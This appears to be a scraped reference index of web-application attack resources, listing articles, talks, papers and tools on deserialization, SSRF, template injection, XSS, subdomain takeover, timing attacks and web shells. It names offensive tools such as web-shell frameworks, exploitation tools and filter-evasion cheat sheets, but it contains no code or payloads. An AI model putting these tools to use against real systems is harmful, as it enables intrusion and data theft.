- ysoserial.net is a collection of utilities and property-oriented programming "gadget chains" discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.
- YSoSerial.Net
- Articles/Blogposts/Writeups
- PHP
- Python
- Articles/Blogposts/Writeups
- Talks * Marshalling Pickles - Chris Frohoff & Gabriel Lawrence(OWASPAppSec California2015) * Object serialization technologies allow programs to easily convert in-memory objects to and from various binary and textual data formats for storage or transfer – but with great power comes great responsibility, because deserializing objects from untrusted data can ruin your day. We will look at historical and modern vulnerabilities across different languages and serialization technologies, including Python, Ruby, and Java, and show how to exploit these issues to achieve code execution. We will also cover some strategies to protect applications from these types of attacks.
- Ruby
- Articles/Blogposts/Writeups
- Talks
- Marshalling Pickles - Chris Frohoff & Gabriel Lawrence(OWASPAppSec California2015)
- Object serialization technologies allow programs to easily convert in-memory objects to and from various binary and textual data formats for storage or transfer – but with great power comes great responsibility, because deserializing objects from untrusted data can ruin your day. We will look at historical and modern vulnerabilities across different languages and serialization technologies, including Python, Ruby, and Java, and show how to exploit these issues to achieve code execution. We will also cover some strategies to protect applications from these types of attacks.
- Marshalling Pickles - Chris Frohoff & Gabriel Lawrence(OWASPAppSec California2015)
- 101
- General
- AllThingsSSRF
- This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location
- AllThingsSSRF
- Articles/Blogposts/Writeups
- SSRF vs Business-Critical Applications Part 1: XXE Tunneling In SAP Net Weaver - erpscan
- A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! - Orange Tsai - BH USA 17
- curl Based SSRF Exploits Against Redis
- Pivoting from blind SSRF to RCE with HashiCorp Consul
- How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!
- Airbnb – Chaining Third-Party Open Redirect into Server-Side Request Forgery (SSRF) via LivePerson Chat - Brett Buerhaus
- CVE-2020-13379 Unauthenticated Full-Read SSRF in Grafana - rhynorater(2020)
- Blind SSRF exploitation - wallarm(2020)
- SVG SSRF Cheatsheet
- Finding SSRF via HTML Injection inside a PDF file on AWS EC2 - Riyaz Walikar(2020)
- Triggering a DNS lookup using Java Deserialization - ParanoidSoftware(2021)
- Bring Your Own SSRF – The Gateway Actuator - Wyatt(2021)
- Attacking Java RMI via SSRF - Tobias Neitzel
- A Glossary of Blind SSRF Chains - Shubham Shah(2021)
- SSRF vulnerabilities caused by SNI proxy misconfigurations - Aleksei Tiurin(2022)
- Exploiting URL Parsing Confusion - Noam Moshe(2022)
- SSRF vulnerabilities and where to find them - Luke Stephens(2022)
- What functionalities are most often vulnerable to SSRFs? Case study of 124 bug bounty reports - BBE
- Server Side Request Forgery (SSRF) and AWS EC2 instances after Instance Meta Data Service version 2(IMDSv2) - Riyaz Walikar(2022)
- Attacking Java RMI via SSRF - Tobias Neitzel(2021)
- URL Filter Subversion - Ricardo Henrique(2021)
- Exploiting URL Parsing Confusion - Noam Moshe(2022)
- Papers
- Presentations, Talks, Videos
- Server-Side Browsing Considered Harmful - Nicolas Gregoire(AppSec EU15)
- A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages - Orange Tsai(BHUSA2017)
- Owning The Cloud Through Server-Side Request Forgery - Ben Sadeghipour, Cody Brocious (Daeken)
- With how many apps are running in the cloud, hacking these instances becomes easier with a simple vulnerability due to an unsanitized user input. In this talk, we’ll discuss a number of different methods that helped us exfil data from different applications using Server-Side Request Forgery (SSRF). Using these methods, we were able to hack some of the major transportation, hospitality, and social media companies and make $50,000 in rewards in 3 months.
- Server Side Request Forgery (SSRF) All-In-One - Busra Demir(2020)
- In this video, Busra Demir will explore how to exploit Server Side Request Forgery (SSRF) by using different attack scenarios. She will dig into how to exploit an SSRF vulnerability: ; - On a Hack the Box machine called Player (SSRF - FFMPEG Exploit); - On a Hack the Box machine called Kotarak (SSRF Filter Bypass/port scan); - By combining SQL Injection on a VulnHub machine called6Days; - Combined with HTML Injection on a VulnHub machine Gemini Inc 1
- A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! - Orange Tsai(BHUSA2017)
- Piercing The Veil: Server Side Request Forgery Attacks On Internal Networks - Alyssa Herrera(Hack.lu2019)
- Demystifying the Server Side - Rajanish Pathak, Rahul Maini & Harsh Jaiswal(EkoParty2020)
- Some server-side mysteries, the unveiling of the lesser-known techniques, and how inconsistency in the URL parsing and treating of certain elements by the server-side components that usually go undetected and can open up big gaps are waiting to be demystified!
- When TLS Hacks You - Joshua Maddux(Defcon Safemode2021)
- BHUSA2020 Slides
- Lots of people try to attack the security of TLS. But what if we use TLS to attack other things? It's a huge standard, and it turns out that features intended to make TLS fast have also made it useful as an attack vector. Among other things, these features provide a lot of flexibility for Server-Side Request Forgery (SSRF). While past work using HTTPS URLs in SSRF has relied upon platform-specific bugs such as SNI injection, we can go further. In this talk, I present a novel, cross-platform way of leveraging TLS to target internal services. Uniquely, these attacks are more effective the more comprehensively a platform supports modern TLS, so won't go away with library upgrades. It is also unlikely that the TLS spec will change overnight at the whim of a random security researcher. Instead, we need to walk through scenarios and dispel common assumptions so the audience can know what to look out for. Of course, the best way to do so is with demos!
- Writeups
- CRLF injection & SSRF in git:// protocal lead to arbitrary code execution - chromium1337(2018)
- GACTF 2020 SimpleFlask Challenge (SSTI) - Arash Parsa(2020)
- GACTF 2020 EZ FLASK (SSRF to SSTI) - Arash Parsa(2020)
- $10000 Facebook SSRF (Bug Bounty) - Amine Aboud(2020)
- Top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports - Lohitaksh Nandan(2023)
- 31k$ SSRF in Google Cloud Monitoring led to metadata exposure - David Nechuta(2020)
- Turning bad SSRF to good SSRF: Websphere Portal (CVE-2021-27748) - Shubham Sha(2021)
- Piercing the Veil: Server Side Request Forgery to NIPRNet access
- Testing
- Tools
- SSRFmap
- Automatic SSRF fuzzer and exploitation tool
- See-SURF
- A Python based scanner to find potential SSRF parameters in a web application. See-SURF helps you detect potential SSRF parameters and validates the finding it by making a DNS/HTTP request back to your server.
- oidc-ssrf
- Evil OIDC server: the OpenID Configuration URL returns a 307 to cause SSRF.
- LORSRF
- Fast CLI tool to find the parameters that can be used to find SSRF or Out-of-band resource load
- TLS Poison
- A tool that allows for generic SSRF via TLS, as well as CSRF via image tags in most browsers. The goals are similar to SNI injection, but this new method uses inherent behaviors of TLS, instead of depending upon bugs in a particular implementation.
- SSRFIRE
- An automated SSRF finder. Just give the domain name and your server and chill! ;) Also has options to find XSS and open redirects
- SSRFmap
- General
- Testing
- Server-Side Template Injection
- 101
- Server-Side Template Injection: RCE for the modern webapp
- Server-Side Template Injection
- Video
- This paper defines a methodology for detecting and exploiting template injection, and shows it being applied to craft RCE zerodays for two widely deployed enterprise web applications. Generic exploits are demonstrated for five of the most popular template engines, including escapes from sandboxes whose entire purpose is to handle user-supplied templates in a safe way.
- SSTI: The Hidden Threat to Web Application Security - Pranav Khune(2022)
- Articles/Writeups
- Exploiting Custom Template Engines - Dalton Campbell
- Server-Side Template Injection - James Kettle(2015)
- Exploiting Jinja SSTI with limited payload size. - niebardzo(2020)
- Jinja2 SSTI Research - Chivato(2020)
- GitHub Pages - Multiple RCEs via insecure Kramdown configuration - $25,000 Bounty - vakzz(2020)
- RCE via Server-Side Template Injection - Gaurav Mishra(2020
- Method Confusion In Go SSTIs Lead To File Read And RCE. - Gus Ralph(2021)
- Doing it the researcher’s way: How I Managed to Get SSTI (Server Side Template Injection) which lead to arbitrary file reading on One of the Leading Payment Systems in Asia - JzeeRx(2022)
- Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - h1pmnh, Dark9T(2022)
- Writeups
- Talks/Presentations/Videos
- SEC642: Killing snakes for fun, Flask SSTIs and RCEs in Python - Moses Frost(SANS)
- Here is a word: Reflection. How many times have you read the words SSTI or even CSTI and wondered what they actually did, how they worked, or how to execute one? How can you take a file reading vulnerability like SSTI into a Remote Code Execution exploit? In this talk we will give you a glance into the SEC642 topic on Server Side Template Injection in Flask and taking that one concept a few steps further by introducing Python Method Reflection to execute code, and even backdoors. Join Moses Frost as he discusses this and other topics that are found in SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques.
- Server-Side Template Injection: RCE For The Modern Web App - James Kettle(2015)
- In this presentation, I'll discuss techniques to recognize template injection, then show how to take template engines on a journey deeply orthogonal to their intended purpose and ultimately gain arbitrary code execution. I'll show this technique being applied to craft exploits that hijack four popular template engines, then demonstrate RCE zero-days on two corporate web applications. This presentation will also cover techniques for automated detection of template injection, and exploiting subtle, application-specific vulnerabilities that can arise in otherwise secure template systems.
- Server-Side Template Injection Workshop - Tib3rius(2021)
- Room for Escape: Scribbling Outside the Lines of Template Security - Alvaro Muñoz, Oleksandr Mirosh
- "Now more than ever, digital communication and collaboration are essential to the modern human experience. People around the globe work together online as they share information, create documents, send emails, and collaborate on spreadsheets and presentations. Shared digital content is everywhere and networked communication platforms and software play a crucial role. Content Management Systems (CMS) allow the user to design, create, modify, and visualize dynamic content. For many companies, CMS platforms are pivotal to their content pipelines and workforce collaboration."
- SEC642: Killing snakes for fun, Flask SSTIs and RCEs in Python - Moses Frost(SANS)
- Tools
- tplmap
- Code and Server-Side Template Injection Detection and Exploitation Tool
- tplmap
- 101
- Client-Side Template Injection
- 101
- Client-side template injection - PortSwigger
- "Client-side template injection vulnerabilities arise when applications using a client-side template framework dynamically embed user input in web pages. When a web page is rendered, the framework will scan the page for template expressions, and execute any that it encounters. An attacker can exploit this by supplying a malicious template expression that launches a cross-site scripting (XSS) attack."
- Client-side template injection - PortSwigger
- Articles/Papers/Talks/Writeups
- Reflected XSS on developer.uber.com via Angular template injection - albinowax(2015)
- XSS without HTML: Client-Side Template Injection with AngularJS - Gareth Hayes(2016/2020)
- So you thought you were safe using AngularJS. . . . Think again! - Lewis Arden(2017)
- Angular Template Injection Payloads
- Client-side Template Injection - ANZ Coders(2018
- Browsers' security controls, backend security libraries and HTTP response security headers have made it very difficult to exploit common security vulnerabilities (yes, you know it, XSS!). However, a trend of insecure usage of JSMVCs has flipped the coin to an attacker advantage. The attacker can misuse rich functionalities brought by a JSMVC to bypass security controls. In this presentation/workshop I will elaborate one of the frontend security vulnerabilities classes, i.e. Client-Side Template Injection (CSTI) and demonstrate how a real-word attack can happen. I will conclude my presentation on best-practices to effectively protect our applications against CSTI.
- Client Side Template Injection - Kacper Szurek(2019)
- Payment Tampering Using Template Injection - Team we45
- Angular Template Injection without Quote Characters - Aviv Yahav(2020)
- Reflected XSS on Microsoft.com via Angular Js template injection - Pratik Dabhi(2020)
- How I Stole Plunker Session Tokens with an Angular Expression - Ryan Hanson(2021)
- Client Side Template Injection (CSTI) - Hacktricks
- 101
- Purposefully Vulnerable Webapps
- Breakable Flask
- A simple vulnerable Flask application.
- Hackable
- A python flask app that is purposfully vulnerable to SQL injection and XSS Attacks
- Injecting Flask - Nvisium
- hackable - JasonHinds
- A python flask app that is purposfully vulnerable to SQL injection and XSS attacks
- Template Injection Workshop: Twig, Jinja, Freemaker and more - GoSecure(2020)
- Code
- Workshop page
- Welcome to this 2-hour workshop on Template Injection. Template injection, also known as Server-Side Template Injection (SSTI), is a vulnerability class that has emerged in 2015. The 2015 Black Hat talk from James Kettle established the foundations for the exploitation techniques in multiple template engines. The exploitation of this type of issue will require specific knowledge of the template library or the language being used under the hood. The workshop is divided in six labs and an introduction. First, there will be an introduction to the vulnerability. This segment is needed to get a good understanding of the attack patterns to recognize potential vulnerabilities. Then we will investigate five different template engines with unique twists. Each template engine will have an exercise which consists of a web application with a template engine being exposed.
- Breakable Flask
- Tools
- 101
- Articles/Blogposts/Writeups
- Hostile Subdomain Takeover using Heroku/Github/Desk + more - Detectify
- 5 Subdomain Takeover #ProTips - Patrik Hudak
- can-i-take-over-xyz
- "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records.
- Talks/Presentations
- DNS hijacking using cloud providers - Frans Rosén - Security Fest 2017
- A few years ago, Frans and his team posted an article on Detectify Labs regarding domain hijacking using services like AWS, Heroku and GitHub. These issues still remains and are still affecting a lot of companies. Jonathan Claudius from Mozilla even calls “Subdomain takeover” “the new XSS”. Since then, many tools have popped up to spot these sorts of vulnerabilities. Frans will go through both the currently disclosed and the non-disclosed ways to take control over domains and will share the specific techniques involved.
- Subdomain Takeovers, beyond the basics for Pentesters and Bug Bounty Hunters - Codingo(2020)
- Discover the tricks to subdomain takeovers that go beyond the basics, allowing you to find more impactful findings in a pentest, or on a bug bounty program.
- DNS hijacking using cloud providers - Frans Rosén - Security Fest 2017
- Tools
- 101
- Tabnabbing: A New Type of Phishing Attack - Aza Raskin
- Reverse Tabnabbing - OWASP
- Reverse tabnabbing is an attack where a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. As the user was originally on the correct page they are less likely to notice that it has been changed to a phishing site, especially it the site looks the same as the target. If the user authenticates to this new page then their credentials (or other sensitive data) are sent to the phishing site rather than the legitimate one.
- Articles/Papers/Talks/Writeups
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Race Detection for Web Applications - Boris Petrov, Martin Vechev, Manu Sridharan, Julian Dolby
- We present the first formulation of a happens-before relation for common web platform features. Developing this relation was a non-trivial task, due to complex feature interactions and browser differences. We also present a logical memory access model for web applications that abstracts away browser implementation details. Based on the above, we implemented WEBRACER, the first dynamic race detector for web applications. WEBRACER is implemented atop the production-quality WebKit engine, enabling testing of full-featured web sites. WEBRACER can also simulate certain user actions, exposing more races. We evaluated WEBRACER by testing a large set of Fortune 100 company web sites. We discovered many harmful races, and also gained insights into how developers handle asynchrony in practice.
- Exposing Private Information by Timing Web Applications - Andrew Bortz, Dan Boneh, Palash Nandy(2007)
- "We show that the time web sites take to respond to HTTP requests can leak private information, using two different types of attacks. The first, direct timing, directly measures response times from a web site to expose private information such as validity of an username at a secured site or the number of private photos in a publicly viewable gallery. The second, cross-site timing, enables a malicious web site to obtain information from the user’s perspective at another site. For example, a malicious site can learn if the user is currently logged in at a victim site and, in some cases, the number of objects in the user’s shopping cart. Our experiments sug- gest that these timing vulnerabilities are wide-spread. We explain in detail how and why these attacks work, and dis- cuss methods for writing web application code that resists these attacks."
- Opportunities and Limits of Remote Timing Attacks - Scott A. Crosby, Dan S. Wallach, Rudolf H. Riedi(2009)
- "Our work analyzes the limits of attacks based on accurately measuring network response times and jitter over a local network and across the Internet. We present the design of filters to significantly reduce the effects of jitter, allowing an attacker to measure events with 15-100μs accuracy across the Internet, and as good as 100ns over a local network. Notably, security-related algorithms on Web servers and other network servers need to be carefully engi- neered to avoid timing channel leaks at the accuracy demonstrated in this article."
- Cross-origin pixel stealing: Timing attacks using CSS filters - Robert Kotcher, Yutong Pei, Pranjal Jumde, Collin Jackson(2013)
- The Clock is Still Ticking: Timing Attacks in the Modern Web - Tom Van Goethem, Wouter Joosen, Nick Nikiforakis(2015)
- "In this paper, we show that modern browsers expose new side-channels that can be used to acquire accurate timing measurements, regardless of network conditions. Using several real-world examples, we introduce four novel web-based timing attacks against modern browsers and describe how an attacker can use them to obtain personal information based on a user’s state on a cross-origin website. We evaluate our proposed attacks and demonstrate that they significantly outperform current attacks in terms of speed, reliability, and accuracy. Furthermore, we show that the nature of our attacks renders traditional defenses, i.e., those based on randomly delaying responses, moot and discuss possible server-side defense mechanisms."
- Timeless Timing Attacks: Exploiting Concurrency to Leak Secrets over Remote Connections - Tom Van Goethem, Christina Pöpper, Wouter Joosen, Mathy Vanhoef(2020)
- "In this paper, we introduce a conceptually novel type of timing attack that leverages the coalescing of packets by network protocols and concurrent handling of requests by applications. These concurrency-based timing attacks infer a relative timing difference by analyzing the order in which responses are returned, and thus do not rely on any absolute timing information. We show how these attacks result in a 100-fold improvement over typical timing attacks performed over the Internet, and can accurately detect timing differences as small as 100ns, similar to attacks launched on a local system. We describe how these timing attacks can be successfully deployed against HTTP/2 webservers, Tor onion services, and EAP-pwd, a popular Wi-Fi authentication method."
- Race Detection for Web Applications - Boris Petrov, Martin Vechev, Manu Sridharan, Julian Dolby
- Tools
- Requests-Racer
- Requests-Racer is a small Python library that lets you use the Requests library to submit multiple requests that will be processed by their destination servers at approximately the same time, even if the requests have different destinations or have payloads of different sizes. This can be helpful for detecting and exploiting race condition vulnerabilities in web applications. (For more information, see motivation.md.)
- Race the Web
- Tests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) simultaneously, and then compares the responses from the server for uniqueness. Includes a number of configuration options.
- timing_attack
- Perform timing attacks against web applications
- Race condition exploit
- Tool to help with the exploitation of web application race conditions
- OWASP TimeGap Theory
- Requests-Racer
- Miscellaneous
- 101
- TLS Redirection (and Virtual Host Confusion) - GrrDog
- The goal of this document is to raise awareness of a little-known group of attacks, TLS redirection / Virtual Host Confusion, and to bring all the information related to this topic together.
- TLS Redirection (and Virtual Host Confusion) - GrrDog
- Articles/Papers/Talks/Writeups
- General
- Tools
- Miscellaneous
- 101
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Examining the Bitsquatting Attack Surface - Jaeson Schultz(Defcon21)
- Paper
- Bit errors in computer memory, when they occur in a stored domain name, can cause Internet traffic to be directed to the wrong Internet location potentially compromising security. When a domain name one bit different from a target domain is registered, this is called "bitsquatting". This presentation builds on previous work in this area presented by Artem Dinaburg at Blackhat 2011. Cisco's research into bitsquatting has revealed several previously unknown vectors for bitsquatting. Cisco has also discovered several new mitigations which do not involve installation of error correcting memory, nor the mass registration of bitsquat domains. In fact some of the new mitigations have the potential to render the problem of bitsquatting to the dustbin of history.
- Examining the Bitsquatting Attack Surface - Jaeson Schultz(Defcon21)
- Articles
- Detection
- Case Study: How Backdoors Bypass Security Solutions with Advanced Camouflage Techniques
- Look at PHP obfuscation methods for webshells
- NeoPI
- What is NeoPI? NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. The intended purpose of NeoPI is to aid in the detection of hidden web shell code. The development focus of NeoPI was creating a tool that could be used in conjunction with other established detection methods such as Linux Malware Detect or traditional signature/keyword based searches.
- Shell Detector
- Shell Detector – is a application that helps you find and identify php/cgi(perl)/asp/aspx shells. Shell Detector has a “web shells” signature database that helps to identify “web shell” up to 99%.
- Loki - Simple IOC Scanner
- Scanner for Simple Indicators of Compromise
- Case Study: How Backdoors Bypass Security Solutions with Advanced Camouflage Techniques
- Tools
- Weevely
- Weevely is a command line web shell dinamically extended over the network at runtime used for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments. The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper in the internal networks.
- Getting Started
- b374k shell 3.2
- This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser
- Simple websockets based webshell
- JSShell
- An interactive multi-user web based JS shell written in Python with Flask (for server side) and of course Javascript and HTML (client side). It was initially created to debug remote esoteric browsers during tests and research. I'm aware of other purposes this tool might serve, use it at your own responsibility and risk.
- htshells
- Self contained web shells and other attacks via .htaccess files.
- Encoding Web Shells in PNG IDAT chunks - idontplaydarts.com
- novahot
- novahot is a webshell framework for penetration testers. It implements a JSON-based API that can communicate with trojans written in any language. By default, it ships with trojans written in PHP, ruby, and python. Beyond executing system commands, novahot is able to emulate interactive terminals, including mysql, sqlite3, and psql. It additionally implements "virtual commands" that make it possible to upload, download, edit, and view remote files locallly using your preferred applications.
- Weevely
- 101
- Types of Cross-Site Scripting - OWASP
- Postcards from a Post-XSS World - Michael Zalewski
- This page is a rough collection of notes on some of the fundamental alternatives to direct script injection that would be available to attackers following the universal deployment of CSP or other security mechanisms designed to prevent the execution of unauthorized scripts. I hope to demonstrate that in many cases, the capabilities offered by these alternative methods are highly compatible with the goals of contemporary XSS attacks.
- ["Gimme a bit!" - Exploring Attacks in the "Post-XSS" World - Takashi Yoneuchi]
- Cross Site Scripting Prevention Cheat Sheet - OWASP
- CERT Advisory CA-2000-02 Malicious HTML TagsEmbedded in Client Web Requests
- HTML Code Injection and Cross-site Scripting - Gunter Ollmann
- Flirting with MIME Types: A Browser’sPerspective - Blake Frantz
- Articles/Blogposts/Writeups
- Actual XSS in 2020 - Samuel Anttila(2020)
- Getting Real with XSS - Olive Simonnet(2019)
- XSS technique without parentheses - The Spanner
- Text/Plain Considered Harmful - Jan
- Setting The ‘REFERER’ Header Using Javascript - Drew Kirkpatrick(2020)
- Unleashing an Ultimate XSS Polyglot - Ahmed Elsobky
- Password stealing from HTTPS login page and CSRF protection bypass with reflected XSS - Michael Koczwara(2020)
- What is the use of CDATA inside JavaScript tags and HTML? - sptrac.com(2017)
- Detecting valid tags/events on XSS exploitation. - Jorge Lajara(2020)
- Presentations, Talks, Videos
- Self XSS: we’re not so different you and I - Mathias Karlsson
- Scriptless Attacks – Stealing the Pie Without Touching the Sill
- Due to their high practical impact, Cross-Site Scripting (XSS) attacks have attracted a lot of attention from the security community members. In the same way, a plethora of more or less effective defense techniques have been proposed, addressing the causes and effects of XSS vulnerabilities. As a result, an adversary often can no longer inject or even execute arbitrary scripting code in several real-life scenarios. In this paper, we examine the attack surface that remains after XSS and similar scripting attacks are supposedly mitigated by preventing an attacker from executing JavaScript code. We address the question of whether an attacker really needs JavaScript or similar functionality to perform attacks aiming for information theft. The surprising result is that an attacker can also abuse Cascading Style Sheets (CSS) in combination with other Web techniques like plain HTML, inactive SVG images or font files. Through several case studies, we introduce the so called scriptless attacks and demonstrate that an adversary might not need to execute code to preserve his ability to extract sensitive informati on from well protected websites. More precisely, we show that an attacker can use seemingly benign features to build side channel attacks that measure and exfiltrate almost arbitrary data displayed on a given website. We conclude this paper with a discussion of potential mitigation techniques against this class of attacks. In addition, we have implemented a browser patch that enables a website to make a vital determination as to being loaded in a detached view or pop-up window. This approach proves useful for prevention of certain types of attacks we here discuss.
- "Gimme a bit!" - Exploring Attacks in the "Post-XSS" World - Takashi Yoneuchi
- Tricks For Weaponizing XSS - Drew Kirkpatrick
- Understanding XSS - Christina Mitchell(Nolacon2019)
- Come learn in depth about the web vulnerability XSS. First we discuss how browsers and web apps work to better understand how it's possible. Then we will cover the following: how to spot it in the wild, how to exploit it, remediation steps, and impact. How can I inject into your webpage? Come learn how!
- Popping Shells Instead OF Alert Boxes: Weaponizing XSS For Fun and Profit - Drew Kirkpatrick(2019)
- Bypass Techniques & Writeups
- Cheat-Sheets/References
- Filter Evasion
- XSS cheatsheet Esp: for filter evasion - RSnake
- Bypassing XSS Detection Mechanisms - Somdev Sangwan(2018)
- XSS Filter Evasion - Zbigniew Banach(2019)
- XSS without parentheses and semi-colons - Gareth Heyes(2019)
- Bypass XSS filters using JavaScript global variables - theMiddle
- Executing non-alphanumeric JavaScript without parenthesis - Gareth Heyes
- Non-alphanumeric code With JavaScript & PHP - Gareth Heyes
- CTF Challenge: INS Hack 2019 / Bypasses Everywhere -corb3nik
- JavaScript without parentheses using DOMMatrix - Gareth Heyes(2020)
- Arbitrary Parentheses-less XSS(against strict CSP policies) - terjang(2020)
- XSS: Arithmetic Operators & Optional Chaining To Bypass Filters & Sanitization - theMiddle(2020)
- Images
- Length
- Restricted Character Sets
- SVG
- Other
- Bypass XSS Protection with xmp, noscript, noframes.. etc.. - Hahwul
- MITM XSS Protection – Still Popping Alerts - doyler.net(2017)
- Attacking and defending JavaScript sandboxes - Gareth Heyes(2020)
- Evading defences using VueJS script gadgets - Gareth Heyes(2020)
- Escaping JavaScript sandboxes with parsing issues - Gareth Heyes(2020)
- Bypassing modern XSS mitigations with code-reuse attacks - Alexander Andersson(2020)
- Lists
- Cheat-Sheets
- Types-Of
- DOM-based
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- In the DOM - no one will hear you scream - Mario Heiderich(Garage4Hackers Ranchoddas Webcast2014)
- This talk is about the DOM and its more twilight areas. Well see the weird parts and talk about where and why this might be security critical and affect your precious online applications, browser extensions or packaged apps. To understand the foundations of what the DOM has become by today, we'll further explore the historical parts - who created the DOM, what was the intention and how fought dirty about it during the browser wars. Finally, we'll see a DOM based attack called "DOM Clobbering". An attack, that is everything but obvious and affected a very popular and commonly used Rich Text Editor. Be prepared for a lot of tech-talk as well as fear and loathing in the browser window. But don't shed no tears, there's a tool that fixes the security crazy for you and this talk will present it.
- Don't Trust The DOM: Bypassing XSS Mitigations Via Script Gadgets - Sebastian Lekies(AppSecEU2017)
- Over the years many techniques have been introduced to prevent or mitigate XSS. Thereby, most of these techniques such as HTML sanitizers or CSP focus on script tags and event handlers. In this talk, we present a novel Web hacking technique that enables an attacker to bypass these mitigations. In order to to so, the attacker abuses so-called script gadgets. A gadget Is a legitimate piece of JS in a page that reads elements via selectors and processes them in a way that results in script execution. To abuse a gadget, the attacker injects benign elements that match the gadget’s selector. Subsequently, the gadget selects the elements and executes the attacker's scripts. As the attacker's markup is benign it passes HTML sanitizers and security policies. The XSS only surfaces when the gadget mistakenly elevates the privileges of the element. Based on real-world examples, we will demonstrate that these gadgets are present in almost all modern JavaScript libraries, APIs and applications.
- Breaking XSS Mitigations Via Script Gadgets - Sebastian Lekies, Krzysztof Kotowicz & Eduardo Vela(BHUSA2017)
- In this talk, we present a novel Web hacking technique that enables an attacker to circumvent most XSS mitigations. In order to do so, the attacker abuses so-called script gadgets. A script gadget Is a legitimate piece of JavaScript in a page that reads elements from the DOM via selectors and processes them in a way that results in script execution
- Eval Villain: Simplifying DOM XSS and JS Reversing - Dennis Goodlett(BSidesCLE2019)
- JavaScript cruft is growing faster than my ability to read. Since I can't read every line of code, I need tools to find important lines. Eval Villain is a web extension for Firefox that hooks native JavaScript functions before the page loads so that you will be notified every time a function is called. Eval Villain has discovered instances of DOM XSS that only appear in 1 of 100 page loads. It makes the reversing of malicious, second-stage encrypted JavaScript code trivial. I plan on walking through all the features of this tool using examples. To follow along, bring a computer that can run Firefox.https://www.irongeek.com/i.php?page=videos/bsidescleveland2019/bsides-cleveland-c-00-eval-villain-simplifying-dom-xss-and-js-reversing-dennis-goodlett
- In the DOM - no one will hear you scream - Mario Heiderich(Garage4Hackers Ranchoddas Webcast2014)
- Papers
- Tools
- Writeups(DOM XSS)
- $20000 Facebook DOM XSS - Vinoth Kumar(2020)
- INTIGRITI XSS CHALLENGE WRITE-UP - František Uhrecký(2019)
- The XSS challenge that +100k people saw but only 90 solved - intigrit(2019)
- How our community hacked our own XSS challenge - Intigriti(2019)
- Intigriti Easter XSS Challenge Write-up - Abdullah Hussam(2020)
- Intigriti XSS Challenge Write-Up - Renaud Martinet(2019)
- Intigriti XSS Challenge #4 - PSPAUL(2019)
- Intigriti Easter XSS Challenge 2020 Write Up - lboynton.com(2020)
- Intigriti XSS Challenge – Fun with DOM XSS - doyler.net(2019)
- Solving Intigriti Challenge using… Content Injection! - Amal Murali(2020)
- Finally! HOW TO solve the INTIGRITI Easter XSS challenge using only Chrome DEVTOOLS! - ST0K
- Mutation XSS
- 101
- Articles/Blogposts/Writeups
- mXSS - TheSpanner(2014)
- Write-up of DOMPurify 2.0.0 bypass using mutation XSS - Michał Bentkowski(2019)
- Mutation XSS - Infinite8security(2016)
- Mutation XSS in Google Search - Tomasz Andrzej Nidecki(2019)
- Mutation XSS- A Unique class of XSS - Pankaj Rane(2019)
- Mutation XSS via namespace confusion – DOMPurify < 2.0.17 bypass - Michal Bentkowski (2020)
- Bypassing DOMPurify again with mutation XSS - Gareth Heyes(2020)
- Talks/Presentations/Videos
- Papers
- mXSS attacks: Attacking well-secured web-applications by using innerHTML mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius(2013)
- Back in 2007, Hasegawa discovered a novel Cross-Site Scripting (XSS) vector based on the mistreatment of the backtick character in a single browser implementation. This initially looked like an implementation error that could easily be fixed. Instead, as this paper shows, it was the first example of a new class of XSS vectors, the class of mutation-based XSS (mXSS) vectors, which may occur in innerHTML and related properties. mXSS affects all three major browser families: IE, Firefox, and Chrome. We were able to place stored mXSS vectors in high-profile applications like Yahoo! Mail, Rediff Mail, OpenExchange, Zimbra, Roundcube, and several commercial products. mXSS vectors bypassed widely deployed server-side XSS protection techniques (like HTML Purifier, kses, htmlLawed, Blueprint and Google Caja), client-side filters (XSS Auditor, IE XSS Filter), Web Application Firewall (WAF) systems, as well as Intrusion Detection and Intrusion Prevention Systems (IDS/IPS). We describe a scenario in which seemingly immune entities are being rendered prone to an attack based on the behavior of an involved party, in our case the browser. Moreover, it proves very difficult to mitigate these attacks: In browser implementations, mXSS is closely related to performance enhancements applied to the HTML code before rendering; in server side filters, strict filter rules would break many web applications since the mXSS vectors presented in this paper are harmless when sent to the browser. This paper introduces and discusses a set of seven different subclasses of mXSS attacks, among which only one was previously known. The work evaluates the attack surface, showcases examples of vulnerable high-profile applications, and provides a set of practicable and low-overhead solutions to defend against these kinds of attacks.
- Automation of Mutated Cross Site Scripting - Anchal Tiwari, J. Jeysree
